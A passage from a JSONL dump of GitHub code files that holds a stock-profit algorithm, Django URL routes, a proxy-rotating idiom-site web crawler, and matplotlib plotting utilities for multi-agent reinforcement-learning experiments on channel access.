List[int]) -> int:\n max_price 
= 0\n\n for i, price in enumerate(prices):\n for j in range(i, len(prices)):\n max_price = max(prices[j] - price, max_price)\n\n return max_price\n\ndef maxProfit_Kadanes(prices: List[int]) -> int:\n max_profit = 0\n min_price = sys.maxsize\n\n for price in prices:\n min_price = min(min_price, price)\n max_profit = max(max_profit, price - min_price)\n\n return max_profit\n\n\ndef test_case():\n case1 = [7, 1, 5, 3, 6, 4]\n\n result1 = maxProfit_brute_force(case1)\n print(result1)\n\n result2 = maxProfit_Kadanes(case1)\n print(result2)","repo_name":"daesookimds/Algorithm","sub_path":"linear_data_structure/best_time_to_buy_and_sell_stock.py","file_name":"best_time_to_buy_and_sell_stock.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70416948735","text":"testcase=int(input())\ncnt=0\nans=[]\nwhile cnt[0-9]+)/searchrestaurants/$', views.searchrestaurants, name='searchrestaurants'),\n url(r'^(?P[0-9]+)/pickrestaurants/$', views.pickrestaurants, name='pickrestaurants'),\n url(r'^(?P[0-9]+)/responses/$', views.responses, name='responses'),\n url(r'^(?P[0-9]+)/recommendation/$', views.recommendation, name='recommendation'), \n url(r'^(?P[0-9]+)/rejection/$', views.rejection, name='rejection'),\n url(r'^(?P[0-9]+)/thankyou/$', views.thankyou, name='thankyou')\n\n]\n\n","repo_name":"emily03196/cereal-killers","sub_path":"django/cerealkillers/pandora/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32721008739","text":"import os\nimport random\nimport requests\nimport threading\nimport time\nfrom bs4 import BeautifulSoup\nfrom bs4.element import Tag\n\nwork_dir = os.getcwd()\nproject_dir = os.path.split(work_dir)[0]\n\nip_pool = [\"124.94.253.104:9999\", \"175.43.179.146:9999\", \"123.101.207.99:9999\", \"123.163.116.170:9999\",\n \"123.52.96.63:9999\", \"114.102.6.8:9999\", \"125.123.153.177:3000\", \"123.54.40.143:9999\", \"59.50.26.216:32676\",\n \"123.169.124.234:9999\", \"122.4.44.54:41007\", \"110.243.13.134:9999\", \"123.169.117.241:9999\",\n \"42.59.100.6:9999\", \"171.11.59.110:9999\"]\n\nall_idioms = []\nfail_urls = []\ncrawded_urls = []\n\nclass myWorm(threading.Thread):\n def __init__(self, id=0, headers=None, idiom_urls=None):\n\n super(myWorm, self).__init__()\n\n self.id = id\n self.idiom_urls = idiom_urls\n self.headers = headers\n\n def clearErrorLogOl(self):\n with open(project_dir + '/log/{}_errorLog'.format(self.id), 'w', encoding='utf-8') as fp:\n fp.write('\\n')\n\n def writeLog(self, str):\n with open(project_dir + '/log/myLog_{}_V2.log'.format(self.id), 'a', encoding='utf-8') as fp:\n fp.write(str)\n fp.write('\\n')\n\n def writeErrorLogOl(self, str):\n with open(project_dir + '/log/{}_errorLog'.format(self.id), 'a', encoding='utf-8') as fp:\n fp.write(str)\n fp.write('\\n')\n\n def requestsUrl(self, url):\n failcount = 0\n ip = ip_pool[random.randrange(0, len(ip_pool))]\n proxy = {'HTTP': ip}\n while True:\n try:\n response = requests.get(url, headers=self.headers, proxies=proxy, timeout=10)\n except:\n self.writeErrorLogOl('wormID:{} crawling current url:{}:'\n 'can not request'.format(self.id, url))\n else:\n if response.status_code == 200:\n return response\n else:\n failcount += 1\n if failcount > 10:\n return []\n else:\n continue\n\n def get_idiom(self):\n global fail_count\n idiom_urls = self.idiom_urls\n global LinksNum\n while 
idiom_urls:\n url = idiom_urls.pop(0)\n if url in fail_urls:\n continue\n response = self.requestsUrl(url)\n if response:\n try:\n response.encoding = \"gbk\"\n soup = BeautifulSoup(response.text, 'lxml')\n td = soup.find('td', valign=\"top\")\n texts = td.find('font', color=\"#000000\").text.replace(\"\\r\", \"\").replace(\"\\t\", \"\").split(\"\\n\")\n fields = [\"成语\", \"拼音\", \"出处\", \"举例造句\", \"近义词\", \"反义词\", \"英文\", \"故事\", \"解释\"]\n cur_idiom = {}\n for item in texts:\n if item != \"\":\n splits = [it.strip() for it in item.split(\":\")]\n left = splits.pop(0).replace(\"【\", \"\").replace(\"】\", \"\")\n right = \":\".join(splits)\n if left in fields:\n cur_idiom[left] = right\n all_idioms.append(cur_idiom)\n crawded_urls.append(url)\n print('wormID:{} crawling current url:{}'\n '\\n\\tsuccessfully\\tthe rest number of Idiom Links:{:.2%}/{}'\n .format(self.id, url, len(idiom_urls) / LinksNum, len(idiom_urls)))\n div = soup.find('div', style=\"margin-left: 6px;line-height: 180%\")\n for tag in div.childGenerator():\n if isinstance(tag, Tag):\n if tag.text == \"成语分类导航:\":\n break\n if tag.get(\"href\", 0) != 0:\n link = tag.get(\"href\").replace(\"..\", \"http://www.hydcd.com/cy\")\n if link not in crawded_urls:\n idiom_urls.append(link)\n idiom_urls = list(set(idiom_urls))\n except:\n print('wormID:{} crawling current url:{}:'\n '\\n\\tfail\\tthe rest number of Idiom Links:{:.2%}/{}'\n .format(self.id, url, len(idiom_urls) / LinksNum, len(idiom_urls)))\n fail_urls.append(url)\n else:\n print('wormID:{} crawling current url:{}'\n '\\n\\tcan not get current link response\\tthe rest number of Idiom Links:{:.2%}/{}'\n .format(self.id, url, len(idiom_urls) / LinksNum, len(idiom_urls)))\n self.writeLog('wormID:{} crawling current url:{}:'\n 'can not get current link response'.format(self.id, url))\n fail_urls.append(url)\n\n def run(self):\n self.get_idiom()\n\n\ndef get_idioms(headers=None, wormNum=30):\n global LinksNum\n with open(project_dir + \"/data/hydcd_idiom_urls.txt\", \"r\") as fin:\n text = fin.read()\n idiom_urls = text.split(\" \")\n LinksNum = len(idiom_urls)\n worm_pool = []\n for i in range(wormNum):\n curWorm = myWorm(id=i+1, headers=headers, idiom_urls=idiom_urls)\n worm_pool.append(curWorm)\n for curWorm in worm_pool:\n curWorm.start()\n time.sleep(2)\n for curWorm in worm_pool:\n curWorm.join()\n\n print(\"成功爬取{}条\".format(len(all_idioms)))\n print(\"失败爬取{}条\".format(len(fail_urls)))\n with open(project_dir + \"/data/hydcd_idioms.txt\", \"w\", encoding=\"utf-8\") as fout:\n for idiom in all_idioms:\n fout.write(str(idiom) + \"\\n\")\n\n\nif __name__ == '__main__':\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Cache-Control': 'max-age=0',\n # 'Connection': 'keep-alive',\n 'Upgrade-Insecure-Requests': '1',\n }\n\n get_idioms(headers=headers, wormNum=30)","repo_name":"Tanh-wink/Crawl","sub_path":"crawl/get_idiom.py","file_name":"get_idiom.py","file_ext":"py","file_size_in_byte":6381,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"79"} +{"seq_id":"20282723205","text":"import numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nfrom typing import List, Tuple\n\nfrom src.utils import lineplot_ci\nfrom src.data_classes import 
Episode\nfrom src.view.utils import smooth_columns, add_annotation\nfrom src.view.metrics import throughput_of_agents, get_joint_policy_action, get_buffer_info, get_return, \\\n get_training_info, get_state_distribution, get_aac_info, get_loss, get_gradients_info, get_critic_training_info, \\\n get_experiment_throughput, get_channel_collisions, experiment_throughput_mean_dev, \\\n get_coma_info, get_coma_actors_info\n\n\ndef plot_episode(episode: Episode):\n max_throughput, agents_throughput, n_packets_sent = throughput_of_agents(episode)\n df_buffer = get_buffer_info([episode])\n joint_action = get_joint_policy_action(episode)\n length_episode = len(episode.history)\n plt.figure(figsize=(length_episode // 10, 12))\n plt.title(\n f\"Episode plot for n_agents={episode.metadata.env_metadata.n_agents}, \"\n f\"n_packets_max={episode.metadata.env_metadata.n_packets_max}\"\n )\n plt.plot(max_throughput)\n plt.plot(agents_throughput)\n plt.plot(df_buffer[\"sum_overflow\"], \".-\")\n plt.plot(joint_action, \"--\")\n plt.legend(\n [\"Data generated\", \"Throughput\", \"Buffer Overflow\", \"Policy\"],\n loc=\"lower left\",\n bbox_to_anchor=(1, 0, 0, 0)\n )\n plt.show()\n\n\ndef plot_training(experiment_training_episodes: List[Episode]):\n df_training = get_training_info(experiment_training_episodes)\n div_episodes = len(experiment_training_episodes) // 3\n distributions = []\n for n_episodes in [1, div_episodes, 2 * div_episodes, len(experiment_training_episodes)]:\n distributions.append(\n (f\"First {n_episodes} episodes\", get_state_distribution(experiment_training_episodes[:n_episodes]))\n )\n\n plt.figure(figsize=(12, 12))\n plt.subplots_adjust(top=1.1)\n\n # Reward\n ax = plt.subplot(3, 2, 1)\n ax.set_title(\"Total average agent reward per episode\")\n ax.set_xlabel(\"Episode\")\n ax.set_ylabel(\"Reward\")\n ax.plot(df_training[\"episode\"], df_training[\"total_reward_avg_agent\"])\n\n # ACK\n ax = plt.subplot(3, 2, 2)\n ax.set_title(\"Number of packets sent per episode\")\n ax.set_xlabel(\"Episode\")\n ax.set_ylabel(\"Number of packets\")\n ax.plot(df_training[\"episode\"], df_training[\"n_packets_sent\"])\n\n # Overflow\n ax = plt.subplot(3, 2, 3)\n ax.set_title(\"Number of packets dropped (buffer overflow) per episode\")\n ax.set_xlabel(\"Episode\")\n ax.set_ylabel(\"Number of packets\")\n ax.plot(df_training[\"episode\"], df_training[\"n_packets_dropped\"])\n\n # Collisions\n ax = plt.subplot(3, 2, 4)\n ax.set_title(\"Number of channel collisions per episode\")\n ax.set_xlabel(\"Episode\")\n ax.set_ylabel(\"Number of collisions\")\n ax.plot(df_training[\"episode\"], df_training[\"n_collisions\"])\n\n # State_distribution (categorical)\n ax = plt.subplot(3, 2, 5)\n ax.set_title(\"Distribution of state categorical variables\")\n ax.set_xlabel(\"Value\")\n ax.set_ylabel(\"Probability\")\n width = 0.3\n variables = [\"ack\", \"data_input\"]\n distributions_last_ep = distributions[-1][1]\n for i, cat in enumerate(variables):\n ax.bar(distributions_last_ep[cat].index + i * width, distributions_last_ep[cat], width)\n ax.legend([\"ack\", \"data_input\"])\n\n # Buffer state\n ax = plt.subplot(3, 2, 6)\n ax.set_title(\"Distribution of buffer state\")\n ax.set_xlabel(\"Value\")\n ax.set_ylabel(\"Probability\")\n for label, distributions_ep in distributions:\n ax.plot(distributions_ep[\"buffer\"].index, distributions_ep[\"buffer\"], label=label)\n ax.legend()\n\n\ndef plot_validation_metrics(\n subplots: Tuple[plt.Figure, List[plt.Axes]],\n experiment_episodes: List[Episode],\n lineplot_kwargs: dict = 
None,\n rolling_mean_window: int = 100,\n n_packets_max: int = 10,\n average_packet_generation: float = None,\n max_throughput: float = 0.5,\n show_plot: bool = True,\n):\n fig, axs = subplots\n axs = axs.flatten()\n lineplot_kwargs = lineplot_kwargs or dict()\n\n def _append_label(text: str):\n return {\n **lineplot_kwargs,\n \"label\": lineplot_kwargs.get(\"label\", \"\") + \" \" + text\n }\n\n # Get metrics\n df_buffer = get_buffer_info(experiment_episodes)\n _cols = [\"avg_buffer\", \"max_buffer\"]\n df_buffer[_cols] = smooth_columns(df_buffer, _cols, rolling_mean_window=rolling_mean_window)\n df_throughput = get_experiment_throughput(experiment_episodes)\n _cols = [\"throughput\"]\n df_throughput[_cols] = smooth_columns(df_throughput, _cols, rolling_mean_window=rolling_mean_window)\n df_collision = get_channel_collisions(experiment_episodes)\n mean_throughput, dev_throughput = experiment_throughput_mean_dev(experiment_episodes)\n\n fig.set_size_inches(15, 10)\n\n # Buffer\n axs[0].set_ylim([0, n_packets_max + 1])\n axs[0].set_title(f\"Average number of packets per agent buffer\")\n lineplot_ci(ax=axs[0], df=df_buffer, x=\"step\", y=\"avg_buffer\", **_append_label(\"avg\"))\n lineplot_ci(ax=axs[0], df=df_buffer, x=\"step\", y=\"max_buffer\", linestyle=\"dashed\", **_append_label(\"max\"))\n axs[0].legend()\n\n # Throughput\n axs[1].set_ylim([0, max_throughput])\n axs[1].set_title(f\"Mean throughput\")\n lineplot_ci(ax=axs[1], df=df_throughput, x=\"step\", y=\"throughput\",\n **_append_label(f\"({mean_throughput:.3f} +- {dev_throughput:.3f})\"))\n if average_packet_generation is not None:\n max_step = df_throughput[\"step\"].max()\n axs[1].plot(\n [0, max_step], [average_packet_generation]*2,\n color=\"black\", label=\"Avg packet generation\", linestyle=\"dashed\"\n )\n axs[1].legend()\n\n # Overflow\n axs[2].set_title(f\"Overflow cumulated sum\")\n lineplot_ci(ax=axs[2], df=df_buffer, x=\"step\", y=\"cumsum_overflow\", **lineplot_kwargs)\n axs[2].legend()\n\n # Collision\n axs[3].set_title(f\"Collisions cumulated sum\")\n lineplot_ci(ax=axs[3], df=df_collision, x=\"step\", y=\"cumsum_collision\", **lineplot_kwargs)\n axs[3].legend()\n\n if show_plot:\n plt.show()\n\n\ndef plot_validation_metrics_barplots(\n subplots: Tuple[plt.Figure, List[plt.Axes]],\n bar_pos: int,\n list_of_experiments: List[List[Episode]],\n n_steps_return: int,\n return_discount: float,\n barplot_kwargs: dict = None\n):\n _std_coef = 1.96 # 95% confidence bound\n\n def _get_mean_std(s: pd.Series):\n mean = s.mean()\n std = None\n if len(df) > 1:\n std = _std_coef * s.std()\n return mean, std\n\n # Get dataframe with metrics of multiple experiments\n data = []\n for n_experiment, experiment_episodes in enumerate(list_of_experiments):\n # Get metrics\n df_buffer = get_buffer_info(experiment_episodes)\n df_reward = get_return(experiment_episodes, n_steps_return, return_discount)\n df_throughput = get_experiment_throughput(experiment_episodes)\n df_collision = get_channel_collisions(experiment_episodes)\n # Append mean data\n data.append({\n \"n_experiment\": n_experiment,\n \"return\": df_reward[\"return\"].mean(),\n \"throughput\": df_throughput[\"throughput\"].mean(),\n \"avg_buffer\": df_buffer[\"avg_buffer\"].mean(),\n \"max_buffer\": df_buffer[\"max_buffer\"].mean(),\n \"collision\": df_collision[\"sum_collision\"].mean(),\n \"overflow\": df_buffer[\"sum_overflow\"].mean(),\n })\n\n # Build Data Frame\n df = pd.DataFrame(data)\n\n # Plot\n fig, axs = subplots\n fig.set_size_inches(10, 5)\n fig.tight_layout()\n 
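A minimal self-contained sketch of the error-bar pattern used in plot_validation_metrics_barplots above, assuming normally distributed per-experiment means (the 1.96 factor is the 95% confidence bound, as in _get_mean_std; the sample values here are invented):

import numpy as np
import matplotlib.pyplot as plt

# Hypothetical per-experiment means for one metric (e.g. throughput).
samples = np.array([0.31, 0.29, 0.34, 0.30])

mean = samples.mean()
# 1.96 * std approximates a 95% confidence bound under a normality assumption;
# with a single experiment there is no spread, so the whisker is dropped.
err = 1.96 * samples.std(ddof=1) if len(samples) > 1 else None

fig, ax = plt.subplots()
ax.bar(0, mean, yerr=err, ecolor="black")  # yerr draws the whisker, as in the code above
ax.set_title("Throughput")
plt.show()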
for ax in axs:\n ax.set_xticklabels([])\n ax.set_title(\"\", fontsize=30, pad=15)\n ax.tick_params(axis='y', labelsize=20)\n\n # Throughput\n throughput_mean, throughput_std = _get_mean_std(df[\"throughput\"])\n axs[0].bar(bar_pos, throughput_mean, yerr=throughput_std, ecolor=\"black\", **barplot_kwargs)\n axs[0].title.set_text('Throughput')\n\n # Collision\n collision_mean, collision_std = _get_mean_std(df[\"collision\"])\n axs[1].bar(bar_pos, collision_mean, yerr=collision_std, ecolor=\"black\", **barplot_kwargs)\n axs[1].title.set_text('Collisions')\n\n # Buffer\n buffer_mean, buffer_std = _get_mean_std(df[\"avg_buffer\"])\n axs[2].bar(bar_pos, buffer_mean, yerr=buffer_std, ecolor=\"black\", **barplot_kwargs)\n axs[2].title.set_text('Buffer occupancy')\n\n # Overflow\n overflow_mean, overflow_std = _get_mean_std(df[\"overflow\"])\n axs[3].bar(bar_pos, overflow_mean, yerr=overflow_std, ecolor=\"black\", **barplot_kwargs)\n axs[3].title.set_text('Buffer overflow')\n\n\ndef plot_per_step_metrics(\n subplots: Tuple[plt.Figure, List[plt.Axes]],\n list_of_experiments: List[List[Episode]],\n n_steps_per_episode: int,\n n_steps_return: int,\n return_discount: float,\n lineplot_kwargs: dict = None,\n rolling_mean_window: int = 100,\n n_packets_max: int = 10,\n average_packet_generation: float = None,\n max_throughput: float = 1.0\n):\n # Get dataframe with metrics of multiple experiments\n df_list = []\n for experiment_episodes in list_of_experiments:\n # Get metrics\n df_buffer = get_buffer_info(experiment_episodes)\n df_reward = get_return(experiment_episodes, n_steps_return, return_discount)\n df_throughput = get_experiment_throughput(experiment_episodes)\n df_collision = get_channel_collisions(experiment_episodes)\n # Merge and smooth\n _merge_keys = [\"episode\", \"step\"]\n df_temp = df_buffer.merge(\n df_reward, how=\"inner\", on=_merge_keys\n ).merge(\n df_throughput, how=\"inner\", on=_merge_keys\n ).merge(\n df_collision, how=\"inner\", on=_merge_keys\n )\n _cols_to_smooth = [\n \"return\", \"reward\", \"avg_buffer\", \"max_buffer\", \"sum_overflow\", \"sum_collision\", \"throughput\"\n ]\n df_temp[_cols_to_smooth] = smooth_columns(df_temp, _cols_to_smooth, rolling_mean_window=rolling_mean_window)\n # Compute time step over all episodes\n df_temp[\"overall_step\"] = df_temp[\"step\"] + (n_steps_per_episode * df_temp[\"episode\"])\n # Store in list\n df_list.append(df_temp)\n # Concat metrics of all experiments\n df = pd.concat(df_list, ignore_index=True)\n\n # Plot\n lineplot_kwargs = lineplot_kwargs or dict()\n fig, axs = subplots\n axs = axs.flatten()\n fig.set_size_inches(15, 40)\n\n # Reward\n axs[0].set_title(f\"{n_steps_return}-steps return (smoothed {rolling_mean_window} steps)\")\n lineplot_ci(ax=axs[0], df=df, x=\"overall_step\", y=\"return\", **lineplot_kwargs)\n axs[0].legend()\n\n # Buffer\n axs[1].set_ylim([0, n_packets_max + 1])\n axs[1].set_title(f\"Average number of packets per agent buffer (smoothed {rolling_mean_window} steps)\")\n lineplot_ci(ax=axs[1], df=df, x=\"overall_step\", y=\"avg_buffer\", **lineplot_kwargs)\n axs[1].legend()\n\n # Throughput\n axs[2].set_ylim([0, max_throughput])\n axs[2].set_title(f\"Throughput (smoothed {rolling_mean_window} steps)\")\n lineplot_ci(ax=axs[2], df=df, x=\"overall_step\", y=\"throughput\", **lineplot_kwargs)\n # if average_packet_generation is not None:\n # max_step = df_throughput[\"step\"].max()\n # axs[1].plot(\n # [0, max_step], [average_packet_generation]*2,\n # color=\"black\", label=\"Avg packet generation\", 
linestyle=\"dashed\"\n # )\n axs[2].legend()\n\n # Overflow\n axs[3].set_title(f\"Overflow per time step (smoothed {rolling_mean_window} steps)\")\n lineplot_ci(ax=axs[3], df=df, x=\"overall_step\", y=\"sum_overflow\", **lineplot_kwargs)\n axs[3].legend()\n\n # Collision\n axs[4].set_title(f\"Collisions per time step (smoothed {rolling_mean_window} steps)\")\n lineplot_ci(ax=axs[4], df=df, x=\"overall_step\", y=\"sum_collision\", **lineplot_kwargs)\n axs[4].legend()\n\n\ndef plot_validation_metrics_per_n_steps_model_learning(\n subplots: Tuple[plt.Figure, List[plt.Axes]],\n n_steps_range: List[int],\n list_of_experiments: List[List[Episode]],\n n_steps_return: int,\n return_discount: float,\n n_packets_max: int,\n lineplot_kwargs: dict = None,\n range_return: List[float] = None,\n range_throughput: List[float] = None,\n range_collision: List[float] = None,\n range_buffer: List[float] = None,\n range_overflow: List[float] = None,\n x_step_size: int = None,\n plot_return: bool = True,\n plot_throughput: bool = True,\n plot_buffer: bool = True,\n plot_buffer_max: bool = True,\n plot_collision: bool = True,\n plot_overflow: bool = True,\n annotate_x_pos=None,\n annotate_label=None\n):\n def _annotate(ax, df, df_column, upside=True): # Should be added after setting ylim\n if annotate_x_pos is not None and annotate_label is not None:\n y_pos_arrow = df[df[\"n_steps\"] == annotate_x_pos][df_column].mean()\n x_min, x_max = ax.get_xlim()\n y_min, y_max = ax.get_ylim()\n x_length = x_max - x_min\n y_length = y_max - y_min\n annotate_x_ratio = (annotate_x_pos - x_min) / x_length\n text_x_pos = x_max - (0.2 * x_length)\n text_y_pos = (\n (y_max - (annotate_x_ratio * y_length * (2/3)))\n if upside else\n (y_min + (annotate_x_ratio * y_length * (2/3)))\n )\n add_annotation(\n ax,\n annotate_label,\n (annotate_x_pos, y_pos_arrow),\n (text_x_pos, text_y_pos),\n arrow_kwargs=dict(\n mutation_scale=15,\n linewidth=1\n ),\n text_kwargs=dict(\n fontsize=18\n )\n )\n\n def _append_label(text: str):\n return {\n **lineplot_kwargs,\n \"label\": lineplot_kwargs.get(\"label\", \"\") + \" \" + text\n }\n\n # Get dataframe with metrics of multiple experiments\n df_list = []\n for n_steps, experiment_episodes in zip(n_steps_range, list_of_experiments):\n # Get metrics\n df_buffer = get_buffer_info(experiment_episodes) if (plot_buffer or plot_overflow) else None\n if df_buffer is not None: # Normalize buffer occupancy as percentage\n df_buffer[[\"avg_buffer\", \"max_buffer\"]] = df_buffer[[\"avg_buffer\", \"max_buffer\"]] * (100 / n_packets_max)\n df_reward = get_return(experiment_episodes, n_steps_return, return_discount) if plot_return else None\n df_throughput = get_experiment_throughput(experiment_episodes) if plot_throughput else None\n df_collision = get_channel_collisions(experiment_episodes) if plot_collision else None\n df_temp = None\n for df in [df_buffer, df_reward, df_throughput, df_collision]:\n if df is not None:\n if df_temp is None:\n df_temp = df\n else:\n df_temp = df_temp.merge(df, how=\"inner\", on=[\"episode\", \"step\"])\n # Mean metrics per episode\n df_gb = df_temp.groupby(\n \"episode\", as_index=False\n ).agg({\n **({\"return\": \"mean\"} if plot_return else {}),\n **({\"throughput\": \"mean\"} if plot_throughput else {}),\n **(\n {\n \"avg_buffer\": \"mean\", \"max_buffer\": \"mean\", \"norm_overflow\": \"mean\"\n }\n if (plot_buffer or plot_overflow)\n else {}\n ),\n **({\"norm_collision\": \"mean\"} if plot_collision else {}),\n })\n df_gb[\"n_steps\"] = n_steps\n df_list.append(df_gb)\n 
# Concat metrics of all experiments\n df = pd.concat(df_list, ignore_index=True)\n\n # Plot\n lineplot_kwargs = lineplot_kwargs or dict()\n fig, axs = subplots\n fig.tight_layout()\n axs = axs if hasattr(axs, \"__iter__\") else [axs]\n # axs = axs.flatten()\n fig.set_size_inches(10, len(axs) * 5)\n ax_counter = 0\n\n # Reward\n if plot_return:\n lineplot_ci(ax=axs[ax_counter], df=df, x=\"n_steps\", y=\"return\", **lineplot_kwargs)\n _range_return = range_return or axs[ax_counter].get_ylim()\n axs[ax_counter].set_ylim(_range_return)\n axs[ax_counter].set_ylabel(\"Return\")\n _annotate(axs[ax_counter], df, \"return\", upside=False)\n ax_counter += 1\n\n # Buffer\n if plot_buffer:\n _range_buffer = range_buffer or [0, 110]\n axs[ax_counter].set_ylim(_range_buffer)\n _yticks = [\n n for n in range(0, 110, 10)\n if _range_buffer[0] <= n <= _range_buffer[1]\n ]\n axs[ax_counter].yaxis.set_ticks(_yticks)\n axs[ax_counter].set_yticklabels([f\"{r}%\" for r in _yticks])\n lineplot_ci(ax=axs[ax_counter], df=df, x=\"n_steps\", y=\"avg_buffer\", **_append_label(\"(avg)\"))\n if plot_buffer_max:\n _max_buffer_kwargs = {\n **_append_label(\"(max)\"),\n \"linestyle\": \"dashed\"\n }\n lineplot_ci(ax=axs[ax_counter], df=df, x=\"n_steps\", y=\"max_buffer\", **_max_buffer_kwargs)\n axs[ax_counter].set_ylabel(\"Buffer occupancy\")\n _annotate(axs[ax_counter], df, \"avg_buffer\", upside=True)\n ax_counter += 1\n\n # Throughput\n if plot_throughput:\n lineplot_ci(ax=axs[ax_counter], df=df, x=\"n_steps\", y=\"throughput\", **lineplot_kwargs)\n _range_throughput = range_throughput or axs[ax_counter].get_ylim()\n axs[ax_counter].set_ylim(_range_throughput)\n axs[ax_counter].set_ylabel(\"Throughput\")\n _annotate(axs[ax_counter], df, \"throughput\", upside=False)\n ax_counter += 1\n\n # Overflow\n if plot_overflow:\n _range_overflow = range_overflow or [0, 1.1]\n axs[ax_counter].set_ylim(_range_overflow)\n _yticks = [\n n/10 for n in range(11)\n if _range_overflow[0] <= n/10 <= _range_overflow[1]\n ]\n axs[ax_counter].yaxis.set_ticks(_yticks)\n lineplot_ci(ax=axs[ax_counter], df=df, x=\"n_steps\", y=\"norm_overflow\", **lineplot_kwargs)\n axs[ax_counter].set_ylabel(\"Buffer overflow probability\")\n _annotate(axs[ax_counter], df, \"norm_overflow\", upside=True)\n ax_counter += 1\n\n # Collision\n if plot_collision:\n _range_collision = range_collision or [0, 1.1]\n axs[ax_counter].set_ylim(_range_collision)\n axs[ax_counter].yaxis.set_ticks([0, 0.2, 0.4, 0.6, 0.8, 1])\n lineplot_ci(ax=axs[ax_counter], df=df, x=\"n_steps\", y=\"norm_collision\", **lineplot_kwargs)\n axs[ax_counter].set_ylabel(\"Collision probability\")\n _annotate(axs[ax_counter], df, \"norm_collision\", upside=True)\n ax_counter += 1\n\n # Format axes\n for ax in axs:\n ax.tick_params(labelsize=20)\n ax.xaxis.label.set_size(20)\n ax.yaxis.label.set_size(20)\n ax.set_xlabel(\"Model-learning dataset size\")\n x_start, x_end = ax.get_xlim()\n _x_step_size = x_step_size or ((x_end - x_start) // 10)\n ax.xaxis.set_ticks(np.arange(x_start+1, x_end, _x_step_size))\n\n\ndef plot_p_transmit_aac(\n ax: plt.Axes,\n experiment_name: str = None,\n df_aac: pd.DataFrame = None,\n y_min=-0.1, y_max=1.0,\n p_aloha=None, # float or list\n p_column: str = \"actor_p_transmit\",\n y_label: str = \"Probability of transmission\"\n):\n _df_aac = get_aac_info(experiment_name) if df_aac is None else df_aac\n legend = []\n ax.set_title(f\"Policy transmission probability\")\n ax.set_ylim([y_min, y_max])\n ax.set_xlabel('Number of packets in buffer')\n ax.set_ylabel(y_label)\n 
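The loop that follows draws one transmission-probability curve per (ack, data_input) state, with the dashed ALOHA line as a fixed 1/n_agents reference. The same grouping idiom in isolation, on an invented frame that reuses the column names from this function:

import pandas as pd
import matplotlib.pyplot as plt

df = pd.DataFrame({
    "ack": [0, 0, 1, 1],
    "data_input": [0, 0, 0, 0],
    "n_packets_buffer": [0, 1, 0, 1],
    "actor_p_transmit": [0.1, 0.4, 0.2, 0.6],
})

fig, ax = plt.subplots()
# groupby over two columns yields (ack, data_input) tuples as group keys.
for (ack, data_in), dfg in df.groupby(["ack", "data_input"]):
    ax.plot(dfg["n_packets_buffer"], dfg["actor_p_transmit"],
            label=f"ACK={ack}, data_in={data_in}")

n_agents = 4
# Slotted-ALOHA reference: transmit with constant probability 1/n_agents.
ax.axhline(1 / n_agents, color="black", linestyle="dashed", label="ALOHA")
ax.legend()
plt.show()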
for (ack, data_in), dfg in _df_aac.groupby([\"ack\", \"data_input\"]):\n legend.append(f\"ACK={ack}, data_in={data_in}\")\n ax.plot(dfg[\"n_packets_buffer\"], dfg[p_column])\n\n if p_aloha is not None:\n max_buffer = df_aac[\"n_packets_buffer\"].max()\n p_aloha_list = [p_aloha] * (max_buffer + 1) if isinstance(p_aloha, float) else p_aloha\n range_buffer = range(0, max_buffer + 1)\n legend.append(\"ALOHA\")\n ax.plot(range_buffer, p_aloha_list, color='black', linestyle='dashed')\n\n ax.legend(legend)\n\n\ndef plot_critic_value_aac(\n ax: plt.Axes,\n experiment_name: str = None,\n df_aac: pd.DataFrame = None\n):\n _df_aac = get_aac_info(experiment_name) if df_aac is None else df_aac\n legend = []\n ax.set_title(f\"Critic value function\")\n ax.set_xlabel('Number of packets in buffer')\n ax.set_ylabel('Expected reward from state')\n for (ack, data_in), dfg in _df_aac.groupby([\"ack\", \"data_input\"]):\n legend.append(f\"ACK={ack}, data_in={data_in}\")\n ax.plot(dfg[\"n_packets_buffer\"], dfg[\"critic_value\"])\n ax.legend(legend)\n\n\ndef plot_training_actor_critic(\n experiment_training_episodes: List[Episode],\n return_discount: float,\n n_steps_return: int = 100,\n n_updates_smoothing: int = 10,\n actor_idx_gradient_info: int = 0,\n plot_avg_gradients: bool = True,\n plot_min_gradients: bool = False,\n plot_max_gradients: bool = False\n):\n def _select_grad_cols(columns):\n return [\n col for col in columns if (col != \"step\") and (\n (plot_avg_gradients and col.startswith(\"mean\")) or\n (plot_min_gradients and col.startswith(\"min\")) or\n (plot_max_gradients and col.startswith(\"max\"))\n )\n\n ]\n\n df_actor_training_info = get_loss(experiment_training_episodes, \"loss_actor\")\n cols = list(df_actor_training_info.columns)\n df_actor_training_info[cols] = smooth_columns(\n df_actor_training_info, cols, rolling_mean_window=n_updates_smoothing\n )\n\n df_gradients_actor = get_gradients_info(\n experiment_training_episodes, \"gradients_info_actors\", gradient_info_num=actor_idx_gradient_info\n )\n\n df_critic_training_info = get_critic_training_info(\n experiment_training_episodes,\n n_steps_return,\n return_discount\n )\n cols = list(df_critic_training_info.columns)\n df_critic_training_info_smoothed = smooth_columns(\n df_critic_training_info, cols, rolling_mean_window=n_updates_smoothing\n )\n df_gradients_critic = get_gradients_info(experiment_training_episodes, \"gradients_info_critic\")\n\n plt.figure(figsize=(50, 40))\n\n ax = plt.subplot(5, 1, 1)\n ax.plot(df_actor_training_info[\"step\"], df_actor_training_info[\"loss\"])\n ax.set_title(f\"Actor training loss (Smoothed)\")\n\n ax = plt.subplot(5, 1, 2)\n columns_grad_actor = _select_grad_cols(df_gradients_actor.columns)\n for col in columns_grad_actor:\n ax.plot(df_gradients_actor[\"step\"], np.log(1 + df_gradients_actor[col]))\n ax.set_title(f\"Actor NUM {actor_idx_gradient_info} gradients (Log Y-axis)\")\n ax.legend(columns_grad_actor)\n\n ax = plt.subplot(5, 1, 3)\n ax.plot(df_critic_training_info_smoothed[\"step\"], df_critic_training_info_smoothed[\"loss\"])\n 